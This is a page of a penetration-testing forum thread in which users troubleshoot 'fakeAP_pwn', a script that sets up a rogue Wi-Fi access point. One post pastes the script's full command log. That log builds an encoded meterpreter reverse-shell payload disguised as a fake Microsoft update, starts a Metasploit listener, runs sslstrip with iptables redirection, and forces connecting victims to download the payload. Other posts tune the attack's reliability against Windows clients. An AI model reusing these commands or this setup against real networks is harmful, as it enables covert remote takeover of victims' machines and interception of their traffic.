Page 10 of 19 FirstFirst ... 89101112 ... LastLast
Results 91 to 100 of 185

Thread: [Script] [Video] FakeAP_pwn (v0.2.1)

  1. #91
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Does this mean my airbase-ng is broken or airbase-ng in general is broken.
    If it's mine can I just re-install airbase-ng?

  2. #92
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by parrotface View Post
    Wifi card = Atheros built into eeepc - driver ath5k
    client XP SP2 HP laptop shows max signal strength
    kernel version 2.6.30.9
    ping 10.0.0.1 17ms, 7ms, 18ms, 3ms, average 11ms re- pings average 38ms, 28ms, 3ms
    ping google.co.uk 83, 47, 50, 63 average 60ms re-ping average 81, 94, 59ms
    How do I bash fakeAP_pwn.sh -V > output.txt? I ran bash fakeAP_pwn.sh -V > output.txt something happened when the script ran but can't find any file output.txt
    thanks
    Output should be in the directory your ran the script in, You try running it again?

  3. #93
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    2

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Hm.. My "victim" dosent get any IP from the DHCP..

    Injection and monitor works on wlan0 and mon0.
    I use a rtl8187 based card, with mac80211.

    Output:
    Code:
    [*] g0tmilk's fakeAP_pwn v0.3-RC12
    [>] Checking environment...
    [i]            ESSID=Free-WiFi
    [i]    fakeAPchannel=6
    [i]        interface=eth0
    [i]    wifiInterface=wlan0
    [i] monitorInterface=mon0
    [i]          payload=vnc
    [i]     backdoorPath=/root/backdoor.exe
    [i]   metasploitPath=/pentest/exploits/framework3
    [i]    htdocs_folder=/var/www/fakeAP_pwn
    [i]              mtu=1800
    [i]      transparent=true
    [i]      respond2All=false
    [i]        fakeAPmac=true
    [i]           extras=false
    [i]            debug=false
    [i]          verbose=2
    [i]        gatewayIP=192.168.32.2
    [i]            ourIP=192.168.32.128
    [i]             port=50981
    [>] Stopping services and programs...
    [i] Command: killall dhcpd3 apache2 airbase-ng wicd-client
    [i] Command: /etc/init.d/dhcp3-server stop
    [i] Command: /etc/init.d/apache2 stop
    [>] Setting up wireless card...
    [i] Command: airmon-ng stop mon0
    [i] Command: ifconfig wlan0 down
    [i] Command: ifconfig wlan0 up
    [i] Command: airmon-ng start wlan0
    [>] Changing MAC Address...
    [i] Command: ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up
    [i]       macAddress=16:8c:9e:65:06:df (unknown)
    [>] Creating scripts...
    [i] Created: /tmp/fakeAP_pwn.rb
    [i] Created: /etc/apache2/sites-available/fakeAP_pwn
    [>] Creating exploit...(Windows)
    [i] Command: /pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 R | /pentest/exploits/framework3/msfencode -x /var/www/fakeAP_pwn/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe
    [>] Creating our fake access point...
    [i] Command: airbase-ng -c 6 -e "Free-WiFi" mon0 -v
    [>] Setting up our end...
    [i] Command: chmod 775 /var/run/
    [i] Command: touch /var/lib/dhcp3/dhcpd.leases
    [>] Starting Metasploit...
    [i] Command: /pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 AutoRunScript=/tmp/fakeAP_pwn.rb E
    [>] Starting SSLStrip...
    [i] Command: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    [i] Command: sslstrip -k -f -l 10000
    [>] Starting DHCP server...
    [i] Command: dhcpd3 -d -f -cf /tmp/fakeAP_pwn.dhcp at0
    [>] Starting Web server...
    [i] Command: /etc/init.d/apache2 start && ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeAP_pwn && /etc/init.d/apache2 reload
    [>] Getting the backdoor (VNC) ready...
    [i] Command: vncviewer -listen
    [>] Forcing target to vist our site...
    [*] Waiting for target to connect...
    
    [>] Cleaning up...
    [i] Command: ls /etc/apache2/sites-available/ | xargs a2dissite fakeAP_pwn && a2ensite default* && /etc/init.d/apache2 reload
    [>] Done! (= Have you... g0tmi1k?
    Any clues?

  4. #94
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by parrotface View Post
    Mine takes about 2 mins not actualy timed it.

    Further testing has shown another problem which I have had previously.
    If I start my attack machine without eth0 connected to my network it fails because eth0 does not have a IP address.
    Now before running script "ifconfig eth0 192.168.3.101 netmask 255.255.255.0 broadcast 192.168.3.255" the script now runs.
    I guess this is a fairly simple fix with an if statement No IP then ifconfig etc etc.
    After downloading and running the update mine took approx 90 seconds to get a meterpreter>
    Thanks for the info!
    Ill look into it!

    Quote Originally Posted by parrotface View Post
    Wifi card = Atheros built into eeepc - driver ath5k
    client XP SP2 HP laptop shows max signal strength
    kernel version 2.6.30.9
    ping 10.0.0.1 17ms, 7ms, 18ms, 3ms, average 11ms re- pings average 38ms, 28ms, 3ms
    ping google.co.uk 83, 47, 50, 63 average 60ms re-ping average 81, 94, 59ms
    How do I bash fakeAP_pwn.sh -V > output.txt? I ran bash fakeAP_pwn.sh -V > output.txt something happened when the script ran but can't find any file output.txt
    thanks
    Thanks for the info!
    the output.txt file should be wherever you ran it from...
    If you change it to:
    bash fakeAP_pwn.sh -V > ~/output.txt
    It should go into your user folder.

    Quote Originally Posted by Jelly View Post
    Hm.. My "victim" dosent get any IP from the DHCP..

    Injection and monitor works on wlan0 and mon0.
    I use a rtl8187 based card, with mac80211.

    Output:
    Code:
     blah
    Any clues?
    What does it get? 0.0.0.0? 169.x.x.x?
    What is the signal strength?
    What version are you using?
    What is shown in the FakeAP Window? DHCP Window?


    Quote Originally Posted by vvpalin View Post
    Awesome script

    Few quick things i noticed ..

    line 251, the sleep timer needs to be incresed just a tad, mine kept failing out at 5 seconds so i changed it to 10. That could be because im in a VM tho.

    line 261, you might want to change to macchanger -A, as i noticed that a totally random mac would fail sometimes when boxes tried to connect


    The last thing really cant be fixed here but its totally worth noting. airbase-ng has "atleast in my opnion" horrible beacons, meaning any windows 7 box can not connect to your fakeAP. It also tends to spew out a TON of beacons with a null ssid so for instance if you look in windows zeroconf "or whatever the hell they call it" youll always see a "Other Network".

    I was kicking around a way to solve this last night and one of the ideas that i came up with was using a combo of aireplay-ng and packetforge-ng to grep out a beacon from a pcap "Or you could make your own " then having an option in airbase-ng to replay your custom beacon.

    Anyways great script and thanks again
    Thanks for the thanks!
    and thanks for the info/hints! (=
    Personally - my Windows 7 (and XP & ubuntu box) connects fine to it 95% of the time. Once twice has it said "other network".
    Saying that, Joker believes airbase-ng is the reason why its "slow" for some people some of the time, and hes had a few ideas on how to change it! So its another why airbase-ng may not be used in later releases...

    I'm liking the idea of "beacon from a pcap" mind you!




    Thanks for the feedback guys!
    Last edited by g0tmi1k; 07-09-2010 at 12:10 PM.
    Have you...g0tmi1k?

  5. #95
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    2

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by g0tmi1k View Post
    What does it get? 0.0.0.0? 169.x.x.x?
    What is the signal strength?
    What version are you using?
    What is shown in the FakeAP Window? DHCP Window?
    a) It Dosent get anything, DHCP-timeout and then it sets its private ip...
    b) Full strenght
    c) Latest fakeAP_pwn v0.3-RC12 (Read the first line of the output )
    d) Probes and Join in FakeAP, Nothing expect the "default" in DHCP (I check it later)

  6. #96
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by parrotface View Post
    Does this mean my airbase-ng is broken or airbase-ng in general is broken.
    If it's mine can I just re-install airbase-ng?
    airbase-ng has many bugs, it you have an atheros card you can try hostAP
    if you don't have an atheros card yo can use a hardware wireless AP
    Last edited by joker5bb; 07-09-2010 at 04:23 PM.

  7. #97
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    17

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Another progress report for you.. running 0.3-RC10..

    * Your WiFi card + driver = alfa card, rtl8187
    * Your kernel version = FRESH install of bt4 w/ 2.6.30.9
    * Signal strength of the AP = 100%
    * The time it takes to ping the AP = avg 23 MS
    * The time it takes to ping google.com when connect to the fakeAP =avg 63 MS
    *Output: No Errors
    * MTU set to match my card / router at 1500.
    * There is some definite inconsistency with DHCP, although after tweaking I'm successfully dishing out IP with no problem.
    *The forced website redirection, download link (mirror link only, update.microsoft.com link times out), and apache servers downloads all work flawlessly on XP.

    As for the exploit, both VNC and SBD are failing for me, It gets to the point of executing the .rb script.. below is the output. It never passes this...


    As a note, still no AVs or firewalls on the hosts, and cache/cookies is cleared out before any of my tests. No connection, remote destop, or remote command line is made. Good luck and great work so far.

    Modifications to 0.3-RC10 - Commented out Line #547
    Code:
    #iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    EDIT(Important) - I believe that I may have found the variable giving people such scattered results with DHCP / Limited Connectivity! I continued some testing with my windows 7(x64) box trying to duplicate the results I posted above..
    I'v found that using a wireless-N adapter on the VICTIM computer will NOT be able to resolve with the DHCP server. For me, And my guess is many others, the repeated DHCP DISCOVER / DHCP OFFER requests are caused by incompatibility of the wireless-N card trying to connect with your injection/monitor mode compatible, B / G card which is serving the AP..

    When switching out my wireless-N card for a wireless-B/G card, INSTANT SUCCESS!
    Last edited by kernel831; 07-10-2010 at 07:11 AM.

  8. #98
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by kernel831 View Post
    EDIT(Important) - I believe that I may have found the variable giving people such scattered results with DHCP / Limited Connectivity! I continued some testing with my windows 7(x64) box trying to duplicate the results I posted above..
    I'v found that ANYONE using a wireless-N adapter on the VICTIM computer will NOT be able to resolve with the DHCP server. For me, And my guess is many others, the repeated DHCP DISCOVER / DHCP OFFER requests are caused by incompatibility of the wireless-N card trying to connect with your injection/monitor mode compatible, B / G card which is serving the AP..

    When switching out my wireless-N card for a wireless-B/G card, INSTANT SUCCESS!
    Hmmmm, not sure if thats entirely true, it may be it some situations but in my case my Target PC is a Windows 7 X64 pc running a Wireless N card and it connects to the AP will full connectivity but it only gains "full connectivity" after selecting one of these options from the annoying pop up window in 7


  9. #99
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    17

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by slowz3r View Post
    Hmmmm, not sure if thats entirely true, it may be it some situations but in my case my Target PC is a Windows 7 X64 pc running a Wireless N card and it connects to the AP will full connectivity but it only gains "full connectivity" after selecting one of these options from the annoying pop up window in 7
    Interesting , I just tested this and came up with the same results I posted earlier, even after changing the ESSID and selecting both home / work network locations on my win7(x64) machine. Does the card hosting your AP have wireless-N compatibility(mabey a b/g/n card)?

    Also the WinXP laptop iv been testing with has a built in b/g card which supports the theory as well since its generally been working on that machine.

  10. #100
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Default Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by kernel831 View Post
    Interesting , I just tested this and came up with the same results I posted earlier, even after changing the ESSID and selecting both home / work network locations on my win7(x64) machine. Does the card hosting your AP have wireless-N compatibility(mabey a b/g/n card)?

    Also the WinXP laptop iv been testing with has a built in b/g card which supports the theory as well since its generally been working on that machine.

    Nope, no N capability on my hosting card, What N cards are you connecting with? Mine is a DW1525 in a Dell desktop

Page 10 of 19 FirstFirst ... 89101112 ... LastLast

Similar Threads

  1. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  2. Script help
    By isdigit in forum OLD Newbie Area
    Replies: 2
    Last Post: 08-21-2009, 02:35 AM
  3. Video: Nmap Video Tutorial 2: Port Scan Boogaloo
    By Irongeek in forum OLD Tutorials and Guides
    Replies: 0
    Last Post: 05-30-2008, 08:07 PM
  4. Video: Nmap Video Tutorial 2: Port Scan Boogaloo
    By Irongeek in forum OLD BT1, Whax and Auditor Videos
    Replies: 0
    Last Post: 05-30-2008, 08:07 PM
  5. LZM Script/lzm2dir script
    By unseen in forum OLD Tutorials and Guides
    Replies: 2
    Last Post: 11-29-2007, 02:51 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •